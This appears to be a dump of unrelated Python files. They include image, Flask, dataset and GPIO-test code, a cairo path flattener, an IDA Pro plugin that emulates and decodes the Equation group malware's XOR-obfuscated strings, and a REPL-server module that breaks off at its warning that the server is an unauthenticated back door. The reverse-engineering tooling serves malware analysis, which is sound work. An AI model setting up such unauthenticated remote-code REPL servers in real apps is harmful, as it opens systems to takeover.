"youtube": {
"url": "https://www.youtube.com/watch?v=w3LJ2bDvDJs",
"entityUniqueId": "YOUTUBE_VIDEO::w3LJ2bDvDJs",
},
},
}
|
nilq/baby-python
|
python
|
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('open')  # NOTE: the original path has no extension; point this at a real image file
if img is not None:
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))  # OpenCV loads BGR; matplotlib expects RGB
    plt.show()
|
nilq/baby-python
|
python
|
from pathlib import Path
from flask import current_app
from flask_marshmallow import Marshmallow
from PIL import Image
from flask_app.commons.util import pil_to_base64
from flask_app.database.database import Version, Card
ma = Marshmallow()
class VersionSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Version
class CardSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Card
exclude = ('img_path',)
img = ma.Method("serialize_img")
def serialize_img(self, obj: Card):
img_path = (Path(current_app.config["ASSETS_PATH"])
/ obj.img_path).resolve()
img = Image.open(img_path)
return pil_to_base64(img)
version_schema = VersionSchema()
card_list_schema = CardSchema(many=True)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This plugin removes the Equation group's XOR-family string obfuscation.
# Python 3 only; tested only under IDA Pro 7.7.
# Drop this file into the plugins directory of your IDA installation, start IDA,
# place the cursor at the start of the decoding function in an IDA View, then run
# Edit->Plugins->Xor Batch Deobfuscation.
# Deobfuscation can also be triggered with the shortcut Ctrl+Shift+D.
import sys
try:
import idaapi
import idc
import idautils
import flare_emu
# import hexdump
except ImportError:
print("[FlareDeobfacatePlugin] Dependencies missing, Please check ida python and flare_emu is installed")
sys.exit()
VERSION = "0.1.0"
def deobfuscate_function():
# for xref in idautils.XrefsTo(idc.get_screen_ea(), 0):
# print(xref.type, idautils.XrefTypeName(xref.type), 'from', hex(xref.frm), 'to', hex(xref.to))
eh = flare_emu.EmuHelper()
info = idaapi.get_inf_structure()
if info.is_64bit():
dx = "rdx"
ax = "rax"
else:
dx = "edx"
ax = "eax"
ea = idc.get_screen_ea()
for xref in idautils.XrefsTo(ea, 0):
addr_call = xref.frm
        addr_before = idc.prev_head(addr_call)    # previous instruction
        addr_before = idc.prev_head(addr_before)  # one more instruction back
        addr_after = idc.next_head(addr_call)     # next instruction
        # verify that the preceding instruction passes the argument, i.e. matches mov edx/rdx, xxx
        if idc.print_insn_mnem(addr_before) == "mov" and idc.print_operand(addr_before, 0) == dx:
#print("0x{:x} => 0x{:x}".format(addr_before, addr_call))
eh.emulateRange(addr_before, endAddr=addr_after, skipCalls=False)
ret = eh.getRegVal( ax )
print( "decrypted at 0x%x: %s" %( addr_call ,eh.getEmuString(ret) ))
            # set a comment at the call site
idc.set_cmt(addr_call, "decrypted: " + eh.getEmuString(ret).decode(), 0)
print ("Deobfuscated")
class XorPlugin(idaapi.plugin_t):
flags = idaapi.PLUGIN_PROC
comment = "Equation 字符串反混淆"
help = "一个小工具,用于反混淆Equation的字符串混淆"
wanted_name = "Xor Batch Deobfuscation"
# wanted_hotkey = "Ctrl+Shift+D"
def init(self):
return idaapi.PLUGIN_KEEP
def term(self):
pass
def run(self, arg):
deobfuscate_function()
def PLUGIN_ENTRY():
return XorPlugin()
|
nilq/baby-python
|
python
|
__all__ = ['App']
import control_characters
import mdfind
import os
import plistlib
import stat
import subprocess
import sys
from writable_property import writable_property
"""
path/to/<name>.py class Name(mac_app.App)
output:
~/Applications/.mac-app-generator/<name>.app (customizable)
app logs:
~/Library/Logs/Applications/<name>/out.log (customizable)
~/Library/Logs/Applications/<name>/err.log (customizable)
app files:
<name>.app/Contents/MacOS/executable bash wrapper (hack to keep app visible)
<name>.app/Contents/MacOS/launchd.plist launchd.plist
<name>.app/Contents/MacOS/script (your class file)
"""
LOGS = os.path.join(os.environ["HOME"], "Library/Logs/Applications")
CODE = """#!/usr/bin/env bash
# LaunchAgent required to keep app visible in Dock
set "${0%/*}"/launchd.plist
trap "launchctl unload '$1'" EXIT
PlistBuddy() { /usr/libexec/PlistBuddy "$@"; }
PlistBuddy -c "Delete WorkingDirectory" -c "Add WorkingDirectory string ${0%/*}" "$1"
PlistBuddy -c "Delete Program" -c "Add Program string ${0%/*}"/script "$1"
Label="$(PlistBuddy -c "Print Label" "$1")"
# logs must exists or launchd will create logs with root permissions
logs="$(PlistBuddy -c "Print StandardErrorPath" -c "Print StandardOutPath" "$1")"
dirs="$(echo "$logs" | grep / | sed 's#/[^/]*$##' | uniq)"
( IFS=$'\\n'; set -- $dirs; [ $# != 0 ] && mkdir -p "$@" )
launchctl unload "$1" 2> /dev/null; launchctl load -w "$1"
while :; do sleep 0.3 && launchctl list "$Label" | grep -q PID || exit 0; done
"""
def dirname(path):
return os.path.dirname(path)
def write(path, data):
"""write a dictionary to a plist file"""
path = os.path.abspath(os.path.expanduser(path))
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
data = {k: v for k, v in data.items() if v is not None}
if hasattr(plistlib, "dump"):
plistlib.dump(data, open(path, 'wb'))
else:
plistlib.writePlist(data, path)
class App:
"""Mac app generator. writable properties: `app_folder`, `app_name`, `app_path`, `app_code`, `app_script`, `app_image`, `app_stderr`, `app_stdout`, `app_env`. methods: `create_app()`"""
app_env = dict((k, control_characters.remove(str(v)))
for k, v in os.environ.items())
def __init__(self, **kwargs):
for k, v in kwargs.items():
if v is not None:
setattr(self, k, v)
@writable_property
def app_name(self):
"""app name. default is class name
app name concepts:
1) custom name self._app_name with @app_name.setter
2) class name self.__class__.__name__.lower().replace("_", "-")
3) module name (os.path.splitext(os.path.basename(self.app_script))[0].replace("_", "-"))
"""
return self.__class__.__name__.lower().replace("_", "-")
@writable_property
def app_folder(self):
"""app folder. default is `~/Applications/.appify/`"""
return os.path.expanduser("~/Applications/.mac-app-generator")
@writable_property
def app_script(self):
"""source script path. default is class module file"""
return sys.modules[self.__class__.__module__].__file__
@writable_property
def app_code(self):
"""source code string"""
return open(self.app_script).read()
@writable_property
def app_path(self):
"""app path. `app_folder`+`app_name`"""
path = os.path.join(self.app_folder, self.app_name)
return "%s.app" % path if os.path.splitext(path)[1] != ".app" else path
@writable_property
def app_image(self):
"""app image. default is `mdfind kMDItemFSName=<app_name>.png` result"""
filename = "%s.png" % self.app_name
matches = mdfind.mdfind(["kMDItemFSName=%s" % filename]).splitlines()
if matches and os.path.exists(matches[0]) and os.path.isfile(matches[0]):
return matches[0]
@writable_property
def app_stdout(self):
"""stdout path. default is `~/Library/Logs/Applications/<name>/out.log`"""
return os.path.join(LOGS, self.app_name, "out.log")
@writable_property
def app_stderr(self):
"""stderr path. default is `~/Library/Logs/Applications/<name>/err.log`"""
return os.path.join(LOGS, self.app_name, "err.log")
def create_app(self):
"""create Mac app"""
if ".app/" not in os.getcwd():
self.create_app_executable()
self.create_app_script()
if self.app_image:
self.create_app_icon()
self.create_app_info()
self.create_app_launchd()
self.refresh_app()
return self
    def create_app_launchd(self):
        """create launchd.plist; <Program> and <WorkingDirectory> are filled in at runtime"""
        Label = "%s.app" % self.app_name
data = dict(
Label=Label,
RunAtLoad=True,
EnvironmentVariables=self.app_env,
StandardOutPath=os.path.expanduser(self.app_stdout),
StandardErrorPath=os.path.expanduser(self.app_stderr)
)
path = os.path.join(self.app_path, "Contents",
"MacOS", "launchd.plist")
write(path, data)
def create_app_executable(self):
"""create app executable file"""
path = os.path.join(self.app_path, "Contents", "MacOS", "executable")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
open(path, "w").write(CODE)
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def create_app_script(self):
"""create app script file"""
path = os.path.join(self.app_path, "Contents", "MacOS", "script")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
open(path, "w").write(self.app_code)
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def create_app_icon(self):
"""create app icon"""
if not self.app_image:
raise OSError('app_image unknown')
if not os.path.exists(self.app_image):
raise OSError('%s NOT EXISTS' % self.app_image)
path = os.path.join(self.app_path, "Contents",
"Resources", "Icon.icns")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
args = ["/usr/bin/sips", "-s", "format",
"icns", self.app_image, "--out", path]
subprocess.check_call(args, stdout=subprocess.PIPE)
def create_app_info(self):
path = os.path.join(self.app_path, "Contents", "Info.plist")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
data = dict(CFBundleExecutable="executable")
if self.app_image:
data.update(CFBundleIconFile="Icon.icns")
write(path, data)
def refresh_app(self):
"""remove .DS_Store and touch folder"""
for folder in [self.app_path, os.path.dirname(self.app_path)]:
try:
f = os.path.join(folder, ".DS_Store")
if os.path.exists(f):
os.unlink(f)
os.utime(folder, None)
except PermissionError:
pass
return self
def __str__(self):
return '<App "%s">' % self.app_path
def __repr__(self):
return self.__str__()
|
nilq/baby-python
|
python
|
from pymongo import MongoClient
client = MongoClient()
def get_db():
return client['parallel_chat']
|
nilq/baby-python
|
python
|
import numpy as np
import os
# Readme_2_data_abstracts showed how the data abstracts work.
# Technically, they already provide all the functionality needed to work with data.
# This part introduces the dataset class, which is based on a dictseqabstract,
# which means you can use it in a similar way.
# However, it adds functionality such as cross-validation loading/saving and subsetting.
# Its main purpose is to make you define datasets as classes in a generic framework,
# so that they can easily be reused between researchers.
# -------------------------------------------------------------------------
### class example
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.summary()
# -------------------------------------------------------------------------
### class example with data selection
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.select import random_subsample
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')},
select = random_subsample(ratio=0.3))
db.summary()
# -------------------------------------------------------------------------
### class example and xval
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import random_kfold
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.set_xval(random_kfold(folds=4,val_frac=1/3))
xval = db.get_xval_set(fold=0,set='train')
# -------------------------------------------------------------------------
### class example and xval with xval saving for later reuse
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import random_kfold
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.set_xval(random_kfold(folds=4,val_frac=1/3), save_path='xval')
xval = db.get_xval_set(fold=0,set='train')
# -------------------------------------------------------------------------
### class example and xval from the dataset class based on an item
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import xval_from_item
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.add('set', ['test'] * len(db))
db.set_xval(xval_from_item(key='set'))
xval = db.get_xval_set(fold=0,set='test')
# -------------------------------------------------------------------------
### Feature extraction
### paths/feat is a mandatory field that should be added when doing feature extraction
### as it determines where the features are stored
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data' if not already performed and add it to the dataset as a 'feat' key
# if new_key is not specified, the item of 'data' is replaced by the feature extracted version
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# again you can specify multiprocessing as:
# db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat', workers=2)
# -------------------------------------------------------------------------
### Feature extraction (Nested)
### paths/feat is a mandatory field that should be added when doing feature extraction
### as it determines where the features are stored
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain()
processor2 = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction for the first time
db.prepare_feat('data',fe_name='np_audio', fe_dp=processor, new_key='feat')
# do feature extraction for the second time (e.g. if its modular, this could save computation time)
db.prepare_feat('feat',fe_name='raw_audio', fe_dp=processor2, new_key='feat2')
# -------------------------------------------------------------------------
### Load data from memory
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data'
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# load features into memory
db.load_memory('feat')
# -------------------------------------------------------------------------
### Load data from memory and keep internal structure
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data'
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# load features into memory
db.load_memory('feat', keep_structure=True)
# -------------------------------------------------------------------------
### Splitting
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
db.summary()
# define processor
processor = ProcessingChain().add(Framing(windowsize=0.1, stepsize=0.1))
# prepare features
db.prepare_feat('data',fe_name='Framing0101', fe_dp=processor, new_key='feat')
# add splitting
db.add_split(split_size=0.5)
# show summary
db.summary()
# both feat and data are timesplitted and read from disk
print(db['data'][0].shape)
print(db['feat'][0].shape)
# -------------------------------------------------------------------------
### Splitting (per frame)
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
db.summary()
# define processor
processor = ProcessingChain().add(Framing(windowsize=0.1, stepsize=0.1))
# prepare features
db.prepare_feat('data',fe_name='Framing0101', fe_dp=processor, new_key='feat')
# add splitting
db.add_split(split_size=1, type='samples', reference_key='feat')
# show summary
db.summary()
# both feat and data are timesplitted and read from disk
print(db['data'][0].shape)
print(db['feat'][0].shape)
# -------------------------------------------------------------------------
### Dataset from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
## Loads the following yaml file
# datasets:
# - name: !class [custom.dataset.dbs.EXAMPLE]
# parameters:
# paths:
# data: !pathjoin [data,data]
# meta: !pathjoin [data,data]
# tmp: !pathjoin [data,tmp]
# !class is a custom constructor that load_yaml_config uses to replace that item by that class
data = load_yaml_config(filename='EXAMPLE_anomaly2', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config through custom_dir
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable to indicate where custom fct are (custom, as in, not present in dabstract)
# This can be used instead of !class [] depending on what you think is most convenient
# structure of the custom should be:
# /dbs/.. for datasets
# /dp/.. for processing layers
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config through custom_dir with xval
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_xval', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print(data.get_xval_set(set='train',fold=0))
# -------------------------------------------------------------------------
### Dataset from config with two datasets and splitting
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.add_split(0.5)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config with two datasets and splitting from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_split', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config with two datasets and subsampling on string
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print([subdb for subdb in data['data']['subdb']])
data.add_select((lambda x,k: x['data']['subdb'][k]=='normal'))
data.summary()
print([subdb for subdb in data['data']['subdb']])
# -------------------------------------------------------------------------
### Dataset from config with two datasets and random subsampling
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
from dabstract.dataset.select import random_subsample
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print([subdb for subdb in data['data']['subdb']])
data.add_select(random_subsample(0.5))
data.summary()
print([subdb for subdb in data['data']['subdb']])
# -------------------------------------------------------------------------
### Dataset from config with two datasets and subsampling on a list and random from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_subsample', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Merge two datasets
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
from dabstract.dataset.select import random_subsample
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data0 = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data0.summary()
# load dataset
data1 = load_yaml_config(filename='EXAMPLE_anomaly2', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data1.summary()
# merge
data = data0+data1
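# show a summary of the merged result (added to mirror the preceding examples)
data.summary()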
|
nilq/baby-python
|
python
|
from .model import EfficientUnetPlusPlus
|
nilq/baby-python
|
python
|
import machine
import time
import json
# GPIO connections on test fixture
gpio_conn = [
{ 'out': 2, 'io': (23, 32) },
{ 'out': 1, 'io': (33, 34) },
{ 'out': 2, 'io': (5, 12, 35) },
{ 'out': 2, 'io': (4, 18) },
{ 'out': 2, 'io': (13, 15) },
{ 'out': 2, 'io': (2, 14) }
]
def testGPIO():
# List of problem pairs (output, input)
problems = []
# Test pins as output in two cycles. There's one set of connections
# that connects three pins together, but one is input only.
for out_idx in range(2):
# Go through each defined connection for setup
for conn in gpio_conn:
if out_idx < conn['out']:
# Make the indexed pin output, the other pins input
for pin_idx, pin in enumerate(conn['io']):
if pin_idx == out_idx:
machine.Pin(pin, machine.Pin.OUT)
else:
machine.Pin(pin, machine.Pin.IN)
# Go through each defined connection again for testing
for test_conn in gpio_conn:
if out_idx < test_conn['out']:
# Turn the output for the indexed connection under test high,
# the others low
for conn in gpio_conn:
if out_idx < conn['out']:
machine.Pin(conn['io'][out_idx]) \
.value(1 if conn == test_conn else 0)
# Now check that the inputs connected to the active output
# are high and the rest are low
for conn in gpio_conn:
if out_idx < conn['out']:
for pin_idx, pin in enumerate(conn['io']):
if pin_idx != out_idx and machine.Pin(pin).value() \
!= (1 if conn == test_conn else 0):
problems.append((conn['io'][out_idx], pin))
# Return list of problem pairs
return list(set(problems))
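# ADC helpers: raw_reading * divider_ratio * 1.1 V reference / 4095 counts turns a
# 12-bit sample into volts; 15.7 and 5.7 are presumably the board's voltage
# divider ratios for V+ and 3V3.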
def getVPlus():
return machine.ADC(machine.Pin(39)).read() * 15.7 * 1.1 / 4095
def getV3V3():
return machine.ADC(machine.Pin(36)).read() * 5.7 * 1.1 / 4095
# Wait for network
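# NOTE: `lan` is assumed to be a network interface (e.g. network.LAN) initialised
# elsewhere, e.g. in boot.py; it is not defined in this script.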
network_tries = 8
while lan.ifconfig()[0] == '0.0.0.0' and network_tries:
time.sleep(2)
network_tries = network_tries - 1
# Get the IP address
ip = lan.ifconfig()[0]
# Run the GPIO test to discover problems
gpio_problems = testGPIO()
# Print all test results as JSON
print(json.dumps({
'vplus': getVPlus(),
'v3v3': getV3V3(),
'gpio': {
'ok': not bool(gpio_problems),
'problems': gpio_problems,
},
'ip': {
'ok': ip != '0.0.0.0',
'address': ip
}
}))
|
nilq/baby-python
|
python
|
import os
import re
import sqlite3
import configparser
from helpers.logger import Logger
from helpers.match import MatchDatabase, MatchSource
from helpers.searchwords import Searchwords
class File:
config = configparser.ConfigParser()
config.read("config.ini")
non_regex_indicator = config.get("ProgramConfig", 'non_regex_indicator')
def __init__(self, file_path):
self.file_path = file_path
self.name = os.path.basename(file_path).replace(".", "_")
self.src_matches = list()
self.db_matches = list()
self.icon = "insert_drive_file" # Materialise Icon
self.fa_icon = "file" # Font Awesome icon, used in the tree-view
self.all_matches = list()
self.unique_words = list()
self.grouped_matches = dict() #contains an array of Match objects for each unique word
def find_matches_in_db_file(self):
# Set icon of file
self.icon = "insert_invitation"
self.fa_icon = "database"
db = sqlite3.connect(self.file_path)
cursor = db.cursor()
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
tables = cursor.fetchall()
for table_name in tables:
table_name = table_name[0]
cursor = db.execute("SELECT * from %s" % table_name)
line = 0
for row in cursor.fetchall():
line += 1
for matchword in Searchwords.db_search_words:
exclude = False
if re.match(File.non_regex_indicator, str(row)):
Searchwords.db_search_words[matchword].regex = True
if re.search(matchword, str(row), re.IGNORECASE):
for item in Searchwords.exclusion_list:
if item[0] == matchword and item[1] in self.file_path:
Logger("Database xclusion found: %s in file %s" % (str(item[0]), self.file_path), Logger.INFO)
exclude = True
if exclude == False:
importance = Searchwords.db_search_words[matchword]
db_match = MatchDatabase(matchword, line, str(table_name), str(row), importance)
self.db_matches.append(db_match)
self.all_matches.append(db_match)
self.orden_matches()
def find_matches_in_src_file(self, CODE_OFFSET, QUERY_IMPORTANCE):
try:
with open(self.file_path, "r", encoding="utf8", errors='ignore') as file:
lines_in_file = file.read().splitlines()
except IOError as e:
Logger("could not open file '%s'. Error:" %(self.file_path, e.strerror), Logger.WARNING)
return list()
line_index = 1
for line in lines_in_file:
for query in Searchwords.src_search_words.keys():
if int(Searchwords.src_search_words[query]) > QUERY_IMPORTANCE:
if re.match(File.non_regex_indicator, query):
Searchwords.src_search_words[query].regex = True
if re.search(query, line.lower(), re.IGNORECASE):
exclude = False
for item in Searchwords.exclusion_list:
if re.search(item[0], line, re.IGNORECASE):
if (item[1] in self.file_path or (item[1] == "" or item[1] is None)):
Logger("Exclusion found: %s in file %s" % (str(item[0]), self.file_path),
Logger.INFO)
exclude = True
if exclude == False:
upper_range = min(line_index + CODE_OFFSET, len(lines_in_file)+1)
lower_range = max(line_index - CODE_OFFSET-1, 1)
src_match = MatchSource(query, line_index, lines_in_file[lower_range:upper_range],
Searchwords.src_search_words[query], len(lines_in_file))
self.all_matches.append(src_match)
self.src_matches.append(src_match)
line_index = line_index + 1
self.orden_matches()
def orden_matches(self):
grouped_matches = list()
#grouping
for match in self.all_matches:
if match.matchword not in self.unique_words:
self.unique_words.append(match.matchword)
for word in self.unique_words:
self.grouped_matches[word] = list()
for match in self.all_matches:
if match.matchword == word:
grouped_matches.append(match)
self.grouped_matches[word].append(match)
# To sort here, use this. But searchwords itself are sorted so.
# print(self.name)
# for matches in reversed([self.grouped_matches[i] for i in sorted(self.grouped_matches,
# key=Searchwords.all_searchwords.__getitem__)]):
# for match in matches:
# print(match.matchword)
# ----
#self.src_matches = grouped_matches
# order them according to query importance
# ordened_matches = OrderedDict()
# for match in self.src_matches:
# ordened_matches[match.matchword] = match
# sorting_dict = OrderedDict(sorted(ordened_matches.items(), key=itemgetter(0)))
# temp_matches = []
# for f, match in sorting_dict.items():
# temp_matches.insert(0, match)
# self.src_matches = temp_matches
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
"""
Interpret all transforms, thereby flattening cairo operations
to just a few primitives, such as move_to line_to and curve_to.
"""
import sys
from math import sin, cos, pi
from bruhat.argv import argv
from bruhat.render import back
from bruhat.render.base import Context
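# Note: y coordinates are negated throughout because cairo's device y axis points
# down, while the back-end's coordinate system (presumably) has y pointing up.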
class Flatten(Context):
def __init__(self):
Context.__init__(self)
self.path = back.Compound()
self.paths = []
def move_to(self, x, y):
x, y = self.matrix(x, y)
item = back.MoveTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def line_to(self, x, y):
x, y = self.matrix(x, y)
item = back.LineTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def curve_to(self, x0, y0, x1, y1, x2, y2):
x0, y0 = self.matrix(x0, y0)
x1, y1 = self.matrix(x1, y1)
x2, y2 = self.matrix(x2, y2)
item = back.CurveTo_Pt(x0, -y0, x1, -y1, x2, -y2)
self.path.append(item)
self.pos = x2, y2
def rel_move_to(self, dx, dy):
assert self.pos is not None, "no current point"
x, y = self.pos
dx, dy = self.matrix.transform_distance(dx, dy)
x, y = x+dx, y+dy
item = back.MoveTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def rel_line_to(self, dx, dy):
assert self.pos is not None, "no current point"
x, y = self.pos
dx, dy = self.matrix.transform_distance(dx, dy)
x, y = x+dx, y+dy
item = back.LineTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def rel_curve_to(self, dx0, dy0, dx1, dy1, dx2, dy2):
assert self.pos is not None, "no current point"
x, y = self.pos
dx0, dy0 = self.matrix.transform_distance(dx0, dy0)
dx1, dy1 = self.matrix.transform_distance(dx1, dy1)
dx2, dy2 = self.matrix.transform_distance(dx2, dy2)
x0, y0 = x+dx0, y+dy0
x1, y1 = x+dx1, y+dy1
x2, y2 = x+dx2, y+dy2
item = back.CurveTo_Pt(x0, -y0, x1, -y1, x2, -y2)
self.path.append(item)
self.pos = x2, y2
def arc(self, x, y, radius, angle1, angle2):
# stay in user space coordinates
if self.pos is None:
x1, y1 = x+radius*cos(angle1), y+radius*sin(angle1)
self.move_to(x1, y1)
p = back.arc_to_bezier_pt(x, -y, radius, -angle2, -angle1)
p = p.reversed()
p.process_cairo(self)
def arc_negative(self, x, y, radius, angle1, angle2):
# stay in user space coordinates
if self.pos is None:
x1, y1 = x+radius*cos(angle1), y+radius*sin(angle1)
self.move_to(x1, y1)
p = back.arc_to_bezier_pt(x, -y, radius, -angle1, -angle2)
p.process_cairo(self)
def close_path(self):
item = back.ClosePath()
self.path.append(item)
def set_source_rgba(self, r, g, b, a):
deco = back.RGBA(r, g, b, a)
self.path.append(deco)
def set_line_width(self, w):
deco = back.LineWidth_Pt(w)
self.path.append(deco)
def stroke(self):
deco = back.Stroke()
self.path.append(deco)
self.paths.append(self.path)
self.path = back.Compound()
self.pos = None
def fill_preserve(self):
deco = back.FillPreserve()
self.path.append(deco)
def fill(self):
deco = back.Fill()
self.path.append(deco)
self.paths.append(self.path)
self.path = back.Compound()
self.pos = None
def test():
def draw_test(cxt):
cxt.translate(100., 0.)
cxt.scale(0.8, 0.7)
cxt.move_to(10., 10.)
cxt.line_to(100., 100.)
cxt.arc(200., 200., 80., 0., 1.1*pi)
cxt.scale(0.7, 1.2)
cxt.translate(50., 50.)
cxt.line_to(300., 300.)
cxt.arc_negative(400., 300., 60., 0., -1.8*pi)
cxt.line_to(600.-10, 400.-10)
cxt.stroke()
import cairo
W, H = 600., 400. # point == 1/72 inch
# black line should follow the red line.
surface = cairo.PDFSurface("output.pdf", W, H)
context = cairo.Context(surface)
context.save()
context.set_source_rgba(1., 0., 0., 0.5)
context.set_line_width(10.)
draw_test(context)
context.restore()
cxt = Flatten()
draw_test(cxt)
for path in cxt.paths:
path.process_cairo(context)
surface.finish()
print("OK")
if __name__ == "__main__":
test()
|
nilq/baby-python
|
python
|
"""REPL server for inspecting and hot-patching a running Python process.
This module makes your Python app serve up a REPL (read-eval-print-loop)
over TCP, somewhat like the Swank server in Common Lisp.
In a REPL session, you can inspect and mutate the global state of your running
program. You can e.g. replace top-level function definitions with new versions
in your running process, or reload modules from disk (with `importlib.reload`).
The REPL server runs in a daemon thread. Terminating the main thread of your
process will terminate the server, also forcibly terminating all open REPL
sessions in that process.
**SECURITY WARNING**: A REPL SERVER IS ESSENTIALLY A BACK DOOR.
Currently, we provide NO authentication or encryption. Anyone can connect, and
once connected, do absolutely anything that the user account running your app
